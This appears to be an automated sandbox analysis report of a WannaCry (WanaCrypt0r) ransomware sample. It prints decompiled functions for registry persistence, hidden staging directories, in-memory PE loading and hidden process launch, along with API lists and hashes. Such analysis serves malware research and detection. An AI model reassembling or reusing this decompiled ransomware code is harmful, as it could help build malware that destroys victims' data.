wcscat.MSVCRT(?,WanaCrypt0r,?,0000DDB6), ref: 0040114B
RegCreateKeyW.ADVAPI32(80000001,?,00000000), ref: 0040117A
GetCurrentDirectoryA.KERNEL32(00000207,?), ref: 0040119A
strlen.MSVCRT(?), ref: 004011A7
RegSetValueExA.ADVAPI32(00000000,0040E030,00000000,00000001,?,00000001), ref: 004011BD
RegQueryValueExA.ADVAPI32(00000000,0040E030,00000000,00000000,?,?), ref: 004011E4
SetCurrentDirectoryA.KERNEL32(?), ref: 004011FA
RegCloseKey.ADVAPI32(00000000), ref: 00401203

Strings

0@, xrefs: 00401157
WanaCrypt0r, xrefs: 00401145
Software\, xrefs: 0040110A

Memory Dump Source

Source File: 00000002.00000002.255070484.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.255064310.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.255084606.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.255096631.000000000040E000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.255115219.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File

Yara matches

Similarity

API ID: CurrentDirectoryValue$CloseCreateQuerystrlenwcscat
String ID: 0@$Software\$WanaCrypt0r
API String ID: 865909632-3421300005
Opcode ID: be197859f140e0a5161343930b87c84f9738d6a9d10ac2d583ef225433aeadb0
Instruction ID: 752dd9e6153134350df00ddc45e524be7a8e60cbe47ba2191db59f61a0b32c4f
Opcode Fuzzy Hash: be197859f140e0a5161343930b87c84f9738d6a9d10ac2d583ef225433aeadb0
Instruction Fuzzy Hash: 09316232801228EBDB218B90DD09BDEBB78EB44751F1140BBE645F6190CB745E84CBA8

Uniqueness

Uniqueness Score: -1.00%

Function 00401B5F Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 123
COMMON

Download Yara Rule

C-Code - Quality: 81%

			E00401B5F(intOrPtr _a4) {
				void _v202;
				short _v204;
				void _v722;
				long _v724;
				signed short _v1240;
				void _v1242;
				long _v1244;
				void* _t55;
				signed int _t65;
				void* _t72;
				long _t83;
				void* _t94;
				void* _t98;

				_t83 =  *0x40f874; // 0x0
				_v1244 = _t83;
				memset( &_v1242, 0, 0x81 << 2);
				asm("stosw");
				_v724 = _t83;
				memset( &_v722, 0, 0x81 << 2);
				asm("stosw");
				_push(0x31);
				_v204 = _t83;
				memset( &_v202, 0, 0 << 2);
				asm("stosw");
				MultiByteToWideChar(0, 0, 0x40f8ac, 0xffffffff,  &_v204, 0x63);
				GetWindowsDirectoryW( &_v1244, 0x104);
				_v1240 = _v1240 & 0x00000000;
				swprintf( &_v724, L"%s\\ProgramData",  &_v1244);
				_t98 = _t94 + 0x30;
				if(GetFileAttributesW( &_v724) == 0xffffffff) {
					L3:
					swprintf( &_v724, L"%s\\Intel",  &_v1244);
					if(E00401AF6( &_v724,  &_v204, _a4) != 0 || E00401AF6( &_v1244,  &_v204, _a4) != 0) {
						L2:
						_t55 = 1;
						return _t55;
					} else {
						GetTempPathW(0x104,  &_v724);
						if(wcsrchr( &_v724, 0x5c) != 0) {
							 *(wcsrchr( &_v724, 0x5c)) =  *_t69 & 0x00000000;
						}
						_t65 = E00401AF6( &_v724,  &_v204, _a4);
						asm("sbb eax, eax");
						return  ~( ~_t65);
					}
				}
				_t72 = E00401AF6( &_v724,  &_v204, _a4);
				_t98 = _t98 + 0xc;
				if(_t72 == 0) {
					goto L3;
				}
				goto L2;
			}

0x00401b68
0x00401b80
0x00401b87
0x00401b89
0x00401b95
0x00401b9c
0x00401b9e
0x00401ba0
0x00401bab
0x00401bb4
0x00401bb6
0x00401bca
0x00401bdd
0x00401be9
0x00401c04
0x00401c06
0x00401c19
0x00401c40
0x00401c53
0x00401c70
0x00401c38
0x00401c3a
0x00000000
0x00401c8f
0x00401c97
0x00401cb2
0x00401cbf
0x00401cc4
0x00401cd6
0x00401ce0
0x00000000
0x00401ce2
0x00401c70
0x00401c2c
0x00401c31
0x00401c36
0x00000000
0x00000000
0x00000000

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,0040F8AC,000000FF,?,00000063), ref: 00401BCA
GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00401BDD
swprintf.MSVCRT(?,%s\ProgramData,?), ref: 00401C04
GetFileAttributesW.KERNEL32(?), ref: 00401C10
swprintf.MSVCRT(?,%s\Intel,?), ref: 00401C53
GetTempPathW.KERNEL32(00000104,?), ref: 00401C97
wcsrchr.MSVCRT(?,0000005C), ref: 00401CAC
wcsrchr.MSVCRT(?,0000005C), ref: 00401CBD

Part of subcall function 00401AF6: CreateDirectoryW.KERNEL32(?,00000000), ref: 00401B07
Part of subcall function 00401AF6: SetCurrentDirectoryW.KERNEL32(?), ref: 00401B12
Part of subcall function 00401AF6: CreateDirectoryW.KERNEL32(?,00000000), ref: 00401B1E
Part of subcall function 00401AF6: SetCurrentDirectoryW.KERNEL32(?), ref: 00401B21

Strings

%s\Intel, xrefs: 00401C4D
%s\ProgramData, xrefs: 00401BFE

Memory Dump Source

Source File: 00000002.00000002.255070484.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.255064310.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.255084606.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.255096631.000000000040E000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.255115219.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File

Yara matches

Similarity

API ID: Directory$CreateCurrentswprintfwcsrchr$AttributesByteCharFileMultiPathTempWideWindows
String ID: %s\Intel$%s\ProgramData
API String ID: 3806094219-198707228
Opcode ID: e04e666ac5ff563214b472014ed4c30e25de200c4a7bf1775954a8b15fda063a
Instruction ID: 4ac525b1174630586dc3f01422198d44c3eaba501bd80531e66e43f198221a67
Opcode Fuzzy Hash: e04e666ac5ff563214b472014ed4c30e25de200c4a7bf1775954a8b15fda063a
Instruction Fuzzy Hash: 2C41447294021DAAEF609BA0DD45FDA777CAF04310F1045BBE608F71E0EA74DA888F59

Uniqueness

Uniqueness Score: -1.00%

Function 004021E9 Relevance: 16.0, APIs: 6, Strings: 3, Instructions: 233
memoryCOMMON

Download Yara Rule

C-Code - Quality: 64%

			E004021E9(void* _a4, char _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, void* _a32) {
				signed int _v8;
				intOrPtr _v40;
				char _v44;
				void* _t82;
				struct HINSTANCE__* _t83;
				intOrPtr* _t84;
				intOrPtr _t89;
				void* _t91;
				void* _t104;
				void _t107;
				intOrPtr _t116;
				intOrPtr _t124;
				signed int _t125;
				signed char _t126;
				intOrPtr _t127;
				signed int _t134;
				intOrPtr* _t145;
				signed int _t146;
				intOrPtr* _t151;
				intOrPtr _t152;
				short* _t153;
				signed int _t155;
				void* _t156;
				intOrPtr _t157;
				void* _t158;
				void* _t159;
				void* _t160;

				_v8 = _v8 & 0x00000000;
				_t3 =  &_a8; // 0x40213f
				if(E00402457( *_t3, 0x40) == 0) {
					L37:
					return 0;
				}
				_t153 = _a4;
				if( *_t153 == 0x5a4d) {
					if(E00402457(_a8,  *((intOrPtr*)(_t153 + 0x3c)) + 0xf8) == 0) {
						goto L37;
					}
					_t151 =  *((intOrPtr*)(_t153 + 0x3c)) + _t153;
					if( *_t151 != 0x4550 ||  *((short*)(_t151 + 4)) != 0x14c) {
						goto L2;
					} else {
						_t9 = _t151 + 0x38; // 0x68004021
						_t126 =  *_t9;
						if((_t126 & 0x00000001) != 0) {
							goto L2;
						}
						_t12 = _t151 + 0x14; // 0x4080e415
						_t13 = _t151 + 6; // 0x4080e0
						_t146 =  *_t13 & 0x0000ffff;
						_t82 = ( *_t12 & 0x0000ffff) + _t151 + 0x18;
						if(_t146 <= 0) {
							L16:
							_t83 = GetModuleHandleA("kernel32.dll");
							if(_t83 == 0) {
								goto L37;
							}
							_t84 = _a24(_t83, "GetNativeSystemInfo", 0);
							_t159 = _t158 + 0xc;
							if(_t84 == 0) {
								goto L37;
							}
							 *_t84( &_v44);
							_t86 = _v40;
							_t23 = _t151 + 0x50; // 0xec8b55c3
							_t25 = _t86 - 1; // 0xec8b55c2
							_t27 = _t86 - 1; // -1
							_t134 =  !_t27;
							_t155 =  *_t23 + _t25 & _t134;
							if(_t155 != (_v40 + _v8 - 0x00000001 & _t134)) {
								goto L2;
							}
							_t31 = _t151 + 0x34; // 0x85680040
							_t89 = _a12( *_t31, _t155, 0x3000, 4, _a32);
							_t127 = _t89;
							_t160 = _t159 + 0x14;
							if(_t127 != 0) {
								L21:
								_t91 = HeapAlloc(GetProcessHeap(), 8, 0x3c);
								_t156 = _t91;
								if(_t156 != 0) {
									 *((intOrPtr*)(_t156 + 4)) = _t127;
									_t38 = _t151 + 0x16; // 0xc3004080
									 *(_t156 + 0x14) =  *_t38 >> 0x0000000d & 0x00000001;
									 *((intOrPtr*)(_t156 + 0x1c)) = _a12;
									 *((intOrPtr*)(_t156 + 0x20)) = _a16;
									 *((intOrPtr*)(_t156 + 0x24)) = _a20;
									 *((intOrPtr*)(_t156 + 0x28)) = _a24;
									 *((intOrPtr*)(_t156 + 0x2c)) = _a28;
									 *((intOrPtr*)(_t156 + 0x30)) = _a32;
									 *((intOrPtr*)(_t156 + 0x38)) = _v40;
									_t54 = _t151 + 0x54; // 0x8328ec83
									if(E00402457(_a8,  *_t54) == 0) {
										L36:
										E004029CC(_t156);
										goto L37;
									}
									_t57 = _t151 + 0x54; // 0x8328ec83
									_t104 = _a12(_t127,  *_t57, 0x1000, 4, _a32);
									_t59 = _t151 + 0x54; // 0x8328ec83
									_a32 = _t104;
									memcpy(_t104, _a4,  *_t59);
									_t107 =  *((intOrPtr*)(_a4 + 0x3c)) + _a32;
									 *_t156 = _t107;
									 *((intOrPtr*)(_t107 + 0x34)) = _t127;
									if(E00402470(_a4, _a8, _t151, _t156) == 0) {
										goto L36;
									}
									_t68 = _t151 + 0x34; // 0x85680040
									_t111 =  *((intOrPtr*)( *_t156 + 0x34)) ==  *_t68;
									if( *((intOrPtr*)( *_t156 + 0x34)) ==  *_t68) {
										_t152 = 1;
										 *((intOrPtr*)(_t156 + 0x18)) = _t152;
									} else {
										 *((intOrPtr*)(_t156 + 0x18)) = E00402758(_t156, _t111);
										_t152 = 1;
									}
									if(E004027DF(_t156) != 0 && E0040254B(_t156) != 0 && E0040271D(_t156) != 0) {
										_t116 =  *((intOrPtr*)( *_t156 + 0x28));
										if(_t116 == 0) {
											 *((intOrPtr*)(_t156 + 0x34)) = 0;
											L41:
											return _t156;
										}
										if( *(_t156 + 0x14) == 0) {
											 *((intOrPtr*)(_t156 + 0x34)) = _t116 + _t127;
											goto L41;
										}
										_push(0);
										_push(_t152);
										_push(_t127);
										if( *((intOrPtr*)(_t116 + _t127))() != 0) {
											 *((intOrPtr*)(_t156 + 0x10)) = _t152;
											goto L41;
										}
										SetLastError(0x45a);
									}
									goto L36;
								}
								_a16(_t127, _t91, 0x8000, _a32);
								L23:
								SetLastError(0xe);
								L3:
								goto L37;
							}
							_t127 = _a12(_t89, _t155, 0x3000, 4, _a32);
							_t160 = _t160 + 0x14;
							if(_t127 == 0) {
								goto L23;
							}
							goto L21;
						}
						_t145 = _t82 + 0xc;
						do {
							_t157 =  *((intOrPtr*)(_t145 + 4));
							_t124 =  *_t145;
							if(_t157 != 0) {
								_t125 = _t124 + _t157;
							} else {
								_t125 = _t124 + _t126;
							}
							if(_t125 > _v8) {
								_v8 = _t125;
							}
							_t145 = _t145 + 0x28;
							_t146 = _t146 - 1;
						} while (_t146 != 0);
						goto L16;
					}
				}
				L2:
				SetLastError(0xc1);
				goto L3;
			}

0x004021ef
0x004021f8
0x00402204
0x0040243d
0x00000000
0x0040243d
0x0040220a
0x00402212
0x00402239
0x00000000
0x00000000
0x00402242
0x0040224a
0x00000000
0x00402254
0x00402254
0x00402254
0x0040225a
0x00000000
0x00000000
0x0040225c
0x00402260
0x00402260
0x00402266
0x0040226a
0x0040228c
0x00402291
0x00402299
0x00000000
0x00000000
0x004022a7
0x004022aa
0x004022af
0x00000000
0x00000000
0x004022b9
0x004022bb
0x004022be
0x004022c1
0x004022c8
0x004022cb
0x004022d1
0x004022d7
0x00000000
0x00000000
0x004022e8
0x004022eb
0x004022ee
0x004022f0
0x004022f5
0x0040230f
0x0040231a
0x00402320
0x00402324
0x0040233d
0x00402340
0x0040234a
0x00402350
0x00402356
0x0040235c
0x00402362
0x00402368
0x0040236e
0x00402374
0x00402377
0x00402386
0x00402436
0x00402437
0x00000000
0x0040243c
0x00402396
0x0040239a
0x0040239d
0x004023a0
0x004023a7
0x004023ba
0x004023bc
0x004023bf
0x004023cc
0x00000000
0x00000000
0x004023d3
0x004023d3
0x004023d6
0x004023eb
0x004023ec
0x004023d8
0x004023e0
0x004023e6
0x004023e6
0x004023f8
0x00402414
0x00402419
0x0040244d
0x00402450
0x00000000
0x00402450
0x0040241e
0x00402448
0x00000000
0x00402448
0x00402420
0x00402421
0x00402424
0x00402429
0x00402441
0x00000000
0x00402441
0x00402430
0x00402430
0x00000000
0x004023f8
0x00402330
0x00402336
0x00402219
0x00402219
0x00000000
0x00402219
0x00402306
0x00402308
0x0040230d
0x00000000
0x00000000
0x00000000
0x0040230d
0x0040226c
0x0040226f
0x0040226f
0x00402272
0x00402276
0x0040227c
0x00402278
0x00402278
0x00402278
0x00402281
0x00402283
0x00402283
0x00402286
0x00402289
0x00402289
0x00000000
0x0040226f
0x0040224a
0x00402214
0x00402219
0x00000000

APIs

Part of subcall function 00402457: SetLastError.KERNEL32(0000000D,00402200,?!@,00000040,?,0000DDB6,?,00402185,0040216E,00402185,00402198,004021A3,004021B2,00000000,0040213F,00000000), ref: 00402463

SetLastError.KERNEL32(000000C1,?,0000DDB6,?,00402185,0040216E,00402185,00402198,004021A3,004021B2,00000000,0040213F,00000000), ref: 00402219
GetModuleHandleA.KERNEL32(kernel32.dll,?,0000DDB6,?,00402185,0040216E,00402185,00402198,004021A3,004021B2,00000000,0040213F,00000000), ref: 00402291
GetProcessHeap.KERNEL32(00000008,0000003C,?,?,?,?,?,?,?,?,?,?,00402185,00402198,004021A3,004021B2), ref: 00402313
HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,00402185,00402198,004021A3,004021B2,00000000), ref: 0040231A
memcpy.MSVCRT(00000000,?,8328EC83,?,?,?,?,?,?,?,?,?,?,00402185,00402198,004021A3), ref: 004023A7

Part of subcall function 00402470: memset.MSVCRT(?,00000000,?), ref: 004024D5

SetLastError.KERNEL32(0000045A), ref: 00402430

Strings

GetNativeSystemInfo, xrefs: 004022A1
kernel32.dll, xrefs: 0040228C
?!@, xrefs: 004021F8

Memory Dump Source

Source File: 00000002.00000002.255070484.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.255064310.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.255084606.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.255096631.000000000040E000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.255115219.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File

Yara matches

Similarity

API ID: ErrorLast$Heap$AllocHandleModuleProcessmemcpymemset
String ID: ?!@$GetNativeSystemInfo$kernel32.dll
API String ID: 1900561814-3657104962
Opcode ID: 0e24c0e50799aa35dd9f5fcc36a4565fcb8133d83dc7aa1daf15d2422d00f892
Instruction ID: 3b750285519b5b92c664dbe57bf04ddc7e4262fbacbc213f0015b22f99412f1c
Opcode Fuzzy Hash: 0e24c0e50799aa35dd9f5fcc36a4565fcb8133d83dc7aa1daf15d2422d00f892
Instruction Fuzzy Hash: 0A81AD71A01602AFDB209FA5CE49AAB77E4BF08314F10443EF945E76D1D7B8E851CB98

Uniqueness

Uniqueness Score: -1.00%

Function 00401AF6 Relevance: 14.0, APIs: 7, Strings: 1, Instructions: 45
COMMON

Download Yara Rule

C-Code - Quality: 91%

			E00401AF6(WCHAR* _a4, WCHAR* _a8, wchar_t* _a12) {
				void* _t15;
				WCHAR* _t17;

				CreateDirectoryW(_a4, 0);
				if(SetCurrentDirectoryW(_a4) == 0) {
					L2:
					return 0;
				}
				_t17 = _a8;
				CreateDirectoryW(_t17, 0);
				if(SetCurrentDirectoryW(_t17) != 0) {
					SetFileAttributesW(_t17, GetFileAttributesW(_t17) | 0x00000006);
					if(_a12 != 0) {
						_push(_t17);
						swprintf(_a12, L"%s\\%s", _a4);
					}
					_t15 = 1;
					return _t15;
				}
				goto L2;
			}

0x00401b07
0x00401b16
0x00401b27
0x00000000
0x00401b27
0x00401b18
0x00401b1e
0x00401b25
0x00401b36
0x00401b40
0x00401b42
0x00401b4e
0x00401b54
0x00401b59
0x00000000
0x00401b59
0x00000000

APIs

CreateDirectoryW.KERNEL32(?,00000000), ref: 00401B07
SetCurrentDirectoryW.KERNEL32(?), ref: 00401B12
CreateDirectoryW.KERNEL32(?,00000000), ref: 00401B1E
SetCurrentDirectoryW.KERNEL32(?), ref: 00401B21
GetFileAttributesW.KERNEL32(?), ref: 00401B2C
SetFileAttributesW.KERNEL32(?,00000000), ref: 00401B36
swprintf.MSVCRT(?,%s\%s,?,?), ref: 00401B4E

Strings

%s\%s, xrefs: 00401B46

Memory Dump Source

Source File: 00000002.00000002.255070484.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.255064310.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.255084606.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.255096631.000000000040E000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.255115219.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File

Yara matches

Similarity

API ID: Directory$AttributesCreateCurrentFile$swprintf
String ID: %s\%s
API String ID: 1036847564-4073750446
Opcode ID: e8d223ccc4edc92c4536f1ca202ba6161fd040db7272db682552e70b0b18d917
Instruction ID: 4a0a9b6f0974b2b783bf1fd4f993800d593798a72c4fd06372b86497b3864b36
Opcode Fuzzy Hash: e8d223ccc4edc92c4536f1ca202ba6161fd040db7272db682552e70b0b18d917
Instruction Fuzzy Hash: 99F06271200208BBEB103F65DE44F9B3B2CEB457A5F015832FA46B61A1DB75A855CAB8

Uniqueness

Uniqueness Score: -1.00%

Function 00401064 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 63
processsynchronizationCOMMON

Download Yara Rule

C-Code - Quality: 81%

			E00401064(CHAR* _a4, long _a8, DWORD* _a12) {
				struct _PROCESS_INFORMATION _v20;
				struct _STARTUPINFOA _v88;
				signed int _t32;
				intOrPtr _t37;

				_t32 = 0x10;
				_v88.cb = 0x44;
				memset( &(_v88.lpReserved), 0, _t32 << 2);
				_v20.hProcess = 0;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_t37 = 1;
				_v88.wShowWindow = 0;
				_v88.dwFlags = _t37;
				if(CreateProcessA(0, _a4, 0, 0, 0, 0x8000000, 0, 0,  &_v88,  &_v20) == 0) {
					return 0;
				}
				if(_a8 != 0) {
					if(WaitForSingleObject(_v20.hProcess, _a8) != 0) {
						TerminateProcess(_v20.hProcess, 0xffffffff);
					}
					if(_a12 != 0) {
						GetExitCodeProcess(_v20.hProcess, _a12);
					}
				}
				CloseHandle(_v20);
				CloseHandle(_v20.hThread);
				return _t37;
			}

0x00401070
0x00401074
0x0040107d
0x00401082
0x00401085
0x00401086
0x00401087
0x0040108d
0x0040108e
0x004010a1
0x004010b0
0x00000000
0x004010f7
0x004010b5
0x004010c5
0x004010cc
0x004010cc
0x004010d5
0x004010dd
0x004010dd
0x004010d5
0x004010ec
0x004010f1
0x00000000

APIs

CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,08000000,00000000,00000000,00000044,?), ref: 004010A8
WaitForSingleObject.KERNEL32(?,?), ref: 004010BD
TerminateProcess.KERNEL32(?,000000FF), ref: 004010CC
GetExitCodeProcess.KERNEL32(?,?), ref: 004010DD
CloseHandle.KERNEL32(?), ref: 004010EC
CloseHandle.KERNEL32(?), ref: 004010F1

Strings

D, xrefs: 00401074

Memory Dump Source

Source File: 00000002.00000002.255070484.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.255064310.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.255084606.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.255096631.000000000040E000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.255115219.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File

Yara matches

Similarity

API ID: Process$CloseHandle$CodeCreateExitObjectSingleTerminateWait
String ID: D
API String ID: 786732093-2746444292
Opcode ID: 520ef4afec62fe4405832db260c3c6b21caa087d375fb1c1d919acb3a27097cb
Instruction ID: fabf2a0aaa91e867d54492d1ca24e81fc8ed090543e33b3e61fa812da4358066
Opcode Fuzzy Hash: 520ef4afec62fe4405832db260c3c6b21caa087d375fb1c1d919acb3a27097cb
Instruction Fuzzy Hash: 8D116431900229ABDB218F9ADD04ADFBF79FF04720F008426F514B65A0DB708A18DAA8

Uniqueness

Uniqueness Score: -1.00%

Function 004077BA Relevance: 12.1, APIs: 8, Instructions: 77
COMMON

Download Yara Rule

C-Code - Quality: 81%

			_entry_(void* __ebx, void* __edi, void* __esi) {
				CHAR* _v8;
				intOrPtr* _v24;
				intOrPtr _v28;
				struct _STARTUPINFOA _v96;
				int _v100;
				char** _v104;
				int _v108;
				void _v112;
				char** _v116;
				intOrPtr* _v120;
				intOrPtr _v124;
				intOrPtr* _t23;
				intOrPtr* _t24;
				void* _t27;
				void _t29;
				intOrPtr _t36;
				signed int _t38;
				int _t40;
				intOrPtr* _t41;
				intOrPtr _t42;
				intOrPtr _t46;
				intOrPtr _t47;
				intOrPtr _t49;
				intOrPtr* _t55;
				intOrPtr _t58;
				intOrPtr _t61;

				_push(0xffffffff);
				_push(0x40d488);
				_push(0x4076f4);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t58;
				_v28 = _t58 - 0x68;
				_v8 = 0;
				__set_app_type(2);
				 *0x40f94c =  *0x40f94c | 0xffffffff;
				 *0x40f950 =  *0x40f950 | 0xffffffff;
				_t23 = __p__fmode();
				_t46 =  *0x40f948; // 0x0
				 *_t23 = _t46;
				_t24 = __p__commode();
				_t47 =  *0x40f944; // 0x0
				 *_t24 = _t47;
				 *0x40f954 = _adjust_fdiv;
				_t27 = E0040793F( *_adjust_fdiv);
				_t61 =  *0x40f870; // 0x1
				if(_t61 == 0) {
					__setusermatherr(E0040793C);
				}
				E0040792A(_t27);
				_push(0x40e00c);
				_push(0x40e008);
				L00407924();
				_t29 =  *0x40f940; // 0x0
				_v112 = _t29;
				__getmainargs( &_v100,  &_v116,  &_v104,  *0x40f93c,  &_v112);
				_push(0x40e004);
				_push(0x40e000);
				L00407924();
				_t55 =  *_acmdln;
				_v120 = _t55;
				if( *_t55 != 0x22) {
					while(1) {
						__eflags =  *_t55 - 0x20;
						if(__eflags <= 0) {
							goto L7;
						}
						_t55 = _t55 + 1;
						_v120 = _t55;
					}
				} else {
					do {
						_t55 = _t55 + 1;
						_v120 = _t55;
						_t42 =  *_t55;
					} while (_t42 != 0 && _t42 != 0x22);
					if( *_t55 == 0x22) {
						L6:
						_t55 = _t55 + 1;
						_v120 = _t55;
					}
				}
				L7:
				_t36 =  *_t55;
				if(_t36 != 0 && _t36 <= 0x20) {
					goto L6;
				}
				_v96.dwFlags = 0;
				GetStartupInfoA( &_v96);
				_t69 = _v96.dwFlags & 0x00000001;
				if((_v96.dwFlags & 0x00000001) == 0) {
					_t38 = 0xa;
				} else {
					_t38 = _v96.wShowWindow & 0x0000ffff;
				}
				_t40 = L00401FE7(_t69, GetModuleHandleA(0), 0, _t55, _t38);
				_v108 = _t40;
				exit(_t40);
				_t41 = _v24;
				_t49 =  *((intOrPtr*)( *_t41));
				_v124 = _t49;
				_push(_t41);
				_push(_t49);
				L0040791E();
				return _t41;
			}

0x004077bd
0x004077bf
0x004077c4
0x004077cf
0x004077d0
0x004077dd
0x004077e2
0x004077e7
0x004077ee
0x004077f5
0x004077fc
0x00407802
0x00407808
0x0040780a
0x00407810
0x00407816
0x0040781f
0x00407824
0x00407829
0x0040782f
0x00407836
0x0040783c
0x0040783d
0x00407842
0x00407847
0x0040784c
0x00407851
0x00407856
0x0040786f
0x00407875
0x0040787a
0x0040787f
0x0040788c
0x0040788e
0x00407894
0x004078d0
0x004078d0
0x004078d3
0x00000000
0x00000000
0x004078d5
0x004078d6
0x004078d6
0x00407896
0x00407896
0x00407896
0x00407897
0x0040789a
0x0040789c
0x004078a7
0x004078a9
0x004078a9
0x004078aa
0x004078aa
0x004078a7
0x004078ad
0x004078ad
0x004078b1
0x00000000
0x00000000
0x004078b7
0x004078be
0x004078c4
0x004078c8
0x004078dd
0x004078ca
0x004078ca
0x004078ca
0x004078e9
0x004078ee
0x004078f2
0x004078f8
0x004078fd
0x004078ff
0x00407902
0x00407903
0x00407904
0x0040790b

APIs

__set_app_type.MSVCRT(00000002), ref: 004077E7
__p__fmode.MSVCRT ref: 004077FC
__p__commode.MSVCRT ref: 0040780A
_initterm.MSVCRT(0040E008,0040E00C), ref: 0040784C
__getmainargs.MSVCRT(?,?,?,?,0040E008,0040E00C), ref: 0040786F
_initterm.MSVCRT(0040E000,0040E004), ref: 0040787F

Memory Dump Source

Source File: 00000002.00000002.255070484.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.255064310.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.255084606.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.255096631.000000000040E000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.255115219.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File

Yara matches

Similarity

API ID: _initterm$__getmainargs__p__commode__p__fmode__set_app_type
String ID:
API String ID: 3626615345-0
Opcode ID: bfbd7971593811c7fff28e35bb39fa0d644f96314b868f8e424e213b276a966c
Instruction ID: 63d29f1c4e41429a3497612c8de1f509d91e94429ea3a2aefb8dc74a018e4fb3
Opcode Fuzzy Hash: bfbd7971593811c7fff28e35bb39fa0d644f96314b868f8e424e213b276a966c
Instruction Fuzzy Hash: 51318BB1D04344AFDB20AFA5DE49F5A7BA8BB05710F10463EF541B72E0CB786805CB59

Uniqueness

Uniqueness Score: -1.00%

Function 00407831 Relevance: 12.1, APIs: 8, Instructions: 72
COMMON

Download Yara Rule

C-Code - Quality: 84%

			E00407831(CHAR* __ebx) {
				void* _t19;
				void _t21;
				intOrPtr _t28;
				signed int _t30;
				int _t32;
				intOrPtr* _t33;
				intOrPtr _t34;
				CHAR* _t35;
				intOrPtr _t38;
				intOrPtr* _t41;
				void* _t42;

				_t35 = __ebx;
				__setusermatherr(E0040793C);
				E0040792A(_t19);
				_push(0x40e00c);
				_push(0x40e008);
				L00407924();
				_t21 =  *0x40f940; // 0x0
				 *(_t42 - 0x6c) = _t21;
				__getmainargs(_t42 - 0x60, _t42 - 0x70, _t42 - 0x64,  *0x40f93c, _t42 - 0x6c);
				_push(0x40e004);
				_push(0x40e000);
				L00407924();
				_t41 =  *_acmdln;
				 *((intOrPtr*)(_t42 - 0x74)) = _t41;
				if( *_t41 != 0x22) {
					while(1) {
						__eflags =  *_t41 - 0x20;
						if(__eflags <= 0) {
							goto L6;
						}
						_t41 = _t41 + 1;
						 *((intOrPtr*)(_t42 - 0x74)) = _t41;
					}
				} else {
					do {
						_t41 = _t41 + 1;
						 *((intOrPtr*)(_t42 - 0x74)) = _t41;
						_t34 =  *_t41;
					} while (_t34 != _t35 && _t34 != 0x22);
					if( *_t41 == 0x22) {
						L5:
						_t41 = _t41 + 1;
						 *((intOrPtr*)(_t42 - 0x74)) = _t41;
					}
				}
				L6:
				_t28 =  *_t41;
				if(_t28 != _t35 && _t28 <= 0x20) {
					goto L5;
				}
				 *(_t42 - 0x30) = _t35;
				GetStartupInfoA(_t42 - 0x5c);
				_t52 =  *(_t42 - 0x30) & 0x00000001;
				if(( *(_t42 - 0x30) & 0x00000001) == 0) {
					_t30 = 0xa;
				} else {
					_t30 =  *(_t42 - 0x2c) & 0x0000ffff;
				}
				_t32 = L00401FE7(_t52, GetModuleHandleA(_t35), _t35, _t41, _t30);
				 *(_t42 - 0x68) = _t32;
				exit(_t32);
				_t33 =  *((intOrPtr*)(_t42 - 0x14));
				_t38 =  *((intOrPtr*)( *_t33));
				 *((intOrPtr*)(_t42 - 0x78)) = _t38;
				_push(_t33);
				_push(_t38);
				L0040791E();
				return _t33;
			}

0x00407831
0x00407836
0x0040783d
0x00407842
0x00407847
0x0040784c
0x00407851
0x00407856
0x0040786f
0x00407875
0x0040787a
0x0040787f
0x0040788c
0x0040788e
0x00407894
0x004078d0
0x004078d0
0x004078d3
0x00000000
0x00000000
0x004078d5
0x004078d6
0x004078d6
0x00407896
0x00407896
0x00407896
0x00407897
0x0040789a
0x0040789c
0x004078a7
0x004078a9
0x004078a9
0x004078aa
0x004078aa
0x004078a7
0x004078ad
0x004078ad
0x004078b1
0x00000000
0x00000000
